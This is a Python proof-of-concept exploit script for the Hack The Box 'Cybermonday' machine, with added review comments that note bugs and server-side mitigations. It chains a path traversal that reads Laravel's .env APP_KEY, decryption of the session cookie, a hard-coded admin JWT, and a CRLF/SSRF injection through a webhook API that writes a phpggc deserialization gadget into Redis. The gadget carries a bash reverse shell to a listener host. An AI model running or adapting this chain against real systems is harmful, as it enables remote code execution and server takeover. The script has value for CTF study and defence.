HTB_Cybermonday_poc.py
import os
import json
import hashlib
import sys
import hmac
import base64
import string
import random
import requests
import subprocess
from Crypto.Cipher import AES
from phpserialize import loads, dumps
# Two positional arguments are expected (listener ip, listener port).
# NOTE(review): the guard only requires one; sys.argv[2] is read further down
# when the phpggc command line is built, so a run with a single argument fails
# there with IndexError instead of printing the usage text here.
if len(sys.argv) < 2:
    print("Usage: python3 HTB_Cybermonday_poc.py <listener ip> <listener port>")
    sys.exit(1)
# Random numeric values used below as the local part of the login e-mail and
# as the password (random, not secrets: these are throwaway, not security
# tokens).
username = random.randint(100, 100000)
password = random.randint(100, 100000)
def mcrypt_decrypt(value, iv):
    """AES-CBC-decrypt ``value`` under the module-level ``key`` with IV ``iv``.

    Both arguments are raw bytes.  The raw block-cipher output is returned
    unchanged: no padding is stripped here, the caller has to do that.
    ``AES.key_size`` is reassigned to the actual key length immediately
    before the cipher is created, so whatever length ``key`` has is accepted.
    """
    global key
    # Reset the accepted key lengths to exactly ours; original relied on this
    # so non-standard key sizes are not rejected by the library.
    AES.key_size = [len(key)]
    return AES.new(key=key, mode=AES.MODE_CBC, IV=iv).decrypt(value)
def decrypt(bstring):
    """Verify and decrypt an encrypted-cookie envelope; ``''`` on MAC mismatch.

    ``bstring`` is base64 text (str or bytes) wrapping a JSON object with
    ``mac``, ``value`` and ``iv`` members, the latter two themselves base64
    strings.  The tag is recomputed as HMAC-SHA256 over the base64 *strings*
    of iv and value (not the decoded bytes) under the module-level ``key``.
    Only if it equals the envelope's ``mac`` is the decoded ciphertext passed
    to ``mcrypt_decrypt``; its raw output is returned as-is.
    """
    global key
    envelope = json.loads(base64.b64decode(bstring).decode())
    claimed_tag = envelope['mac']
    ct_b64 = bytes(envelope['value'], 'utf-8')
    iv_b64 = bytes(envelope['iv'], 'utf-8')
    # The signed material is iv||value as transmitted (base64 text).
    expected_tag = hmac.new(key, iv_b64 + ct_b64, hashlib.sha256).hexdigest()
    if claimed_tag != expected_tag:
        return ''
    return mcrypt_decrypt(base64.b64decode(ct_b64), base64.b64decode(iv_b64))
# Overall flow of the script body: (1) log in to obtain a session cookie,
# (2) read APP_KEY from the exposed .env, (3) decrypt the cookie to learn the
# session id, (4) build a serialized gadget chain with phpggc, (5) write it
# into the matching Redis session key through the webhooks API, (6) load a
# page so the application reads the tampered session back.

# --- (1) HTTP session for the front end -------------------------------------
# A persistent Session so the cookie jar keeps 'cybermonday_session', which is
# read back below.
sess = requests.Session()
# Authenticate with the throwaway credentials generated above.  The '%40' is a
# literal inside the form value; requests form-encodes the dict, so the server
# receives it percent-encoded a second time — NOTE(review): confirm this is
# what the application expects rather than a plain '@'.
sess.post('http://cybermonday.htb/login', data={"email": f"{username}%40cybermonday.htb", "password":password})

# --- (2) Read the application's .env through the static-assets path --------
# The '/assets../' segment is what exposes the file.  Mitigation on the server
# side: serve static files from a dedicated root that cannot escape upward,
# and keep .env outside the web tree.
url = "http://cybermonday.htb/assets../.env"
# Unauthenticated GET; the logged-in session is not needed for this step.
response = requests.get(url)
if response.status_code == 200:
    lines = response.text.split('\n')
    # Extract APP_KEY from the dotenv text.  Presumably the line has the form
    # 'APP_KEY=base64:<key>', so the text after the first ':' is the encoded
    # key — verify against the real file format.
    app_key = None
    for line in lines:
        if line.startswith("APP_KEY="):
            app_key = line.split(":")[1]
            break
    if app_key:
        app_key1 = app_key
    else:
        print("APP_KEY not found in the response.")
else:
    print(f"Failed to retrieve .env file. Status code: {response.status_code}")
# NOTE(review): both failure branches above only print and fall through;
# 'app_key1' is bound solely on the success path, so the next statement raises
# NameError when the key was not obtained.
# 'key' is the secret decrypt()/mcrypt_decrypt() use for both the HMAC check
# and AES; once it is readable, every cookie it protects can be decrypted.
key = base64.b64decode(app_key1)
# Decrypt the session cookie issued at login ('%3D' is the URL-encoded '=' of
# the base64 padding).  decrypt() returns bytes; str() of those is their repr,
# and the id is taken between the first '|' and the next backslash, i.e. up to
# the first escaped non-printable byte in the repr.  Presumably the decrypted
# value is '<hmac>|<session id>' followed by padding — confirm.
session = str(decrypt(str(sess.cookies['cybermonday_session'].replace('%3D', '=')))).split('|')[1].split('\\')[0]

# --- (4) Build the serialized gadget chain with phpggc ----------------------
# Example invocation the author used:
# phpggc -A Laravel/RCE10 system "bash -c 'bash -i >& /dev/tcp/10.10.14.17/9999 0>&1'"
# NOTE(review): the two argv values are interpolated unquoted into a string
# that runs with shell=True, so they are subject to shell interpretation.
command = f"phpggc -A Laravel/RCE10 system \"bash -c 'bash -i >& /dev/tcp/{sys.argv[1]}/{sys.argv[2]} 0>&1'\""
result = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if result.returncode == 0:
    command_output = result.stdout
    #replacements = {'"': '\\"', '\\': '\\\\', '\\"': '\"'}
    #for char, replacement in replacements.items():
    # command_output = command_output.replace(char, replacement)
    # Newlines are removed so the whole blob fits on the single CRLF-terminated
    # Redis command line built below.
    payload = command_output.replace('\n', '')
else:
    print("Command failed with error:")
    print(result.stderr)
    # NOTE(review): 'payload' stays unbound on this path and execution
    # continues into the webhook step that references it.

# --- (5) Reach Redis through the webhooks API --------------------------------
# Hard-coded bearer token for the webhooks API (an HS256 JWT whose payload
# segment carries admin claims).  How it was obtained is not shown in this
# file.
token="eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6MSwidXNlcm5hbWUiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.hsjDWoGJbgx_ygJe9nlfu4dNZHUZuF3Igy43NfKQ7aE"
headers = {
    "Content-Type": "application/json",
    "x-access-token": token
}
# Create a webhook whose action makes the API send a request on the caller's
# behalf; the random suffix keeps the name unique across runs.
data = {
    "name": "test" + str(''.join(random.choices(string.digits, k=5))),
    "description": "test",
    "action": "sendRequest"
}
req = json.loads(requests.post('http://webhooks-api-beta.cybermonday.htb/webhooks/create', headers=headers, data=json.dumps(data)).text)
uuid = req['webhook_uuid']
# The 'method' field is not an HTTP verb here: it carries a raw Redis SET for
# the key 'laravel_session:<session>', CRLF-terminated, whose value is the
# serialized gadget chain.  Presumably the forwarder copies this field
# verbatim into the request line it sends to 'url', which is what lets the
# line reach Redis.  Mitigations on the API side: allow-list the method,
# reject CR/LF in every field, refuse internal/non-HTTP destinations; on the
# Redis side: require authentication and isolate it from the webhook host.
data = {
    "url": "http://redis:6379/",
    "method": "SET laravel_session:" + session + " '" + payload + "'\r\n"
}
req = requests.post('http://webhooks-api-beta.cybermonday.htb/webhooks/' + str(uuid), headers=headers, data=json.dumps(data))
print("[+] Get reverse shell")

# --- (6) Make the application read the tampered session ---------------------
# Loading an authenticated page with the original cookie makes the
# application fetch (and presumably unserialize) the session entry that was
# just overwritten in Redis.
exp=sess.get('http://cybermonday.htb/home')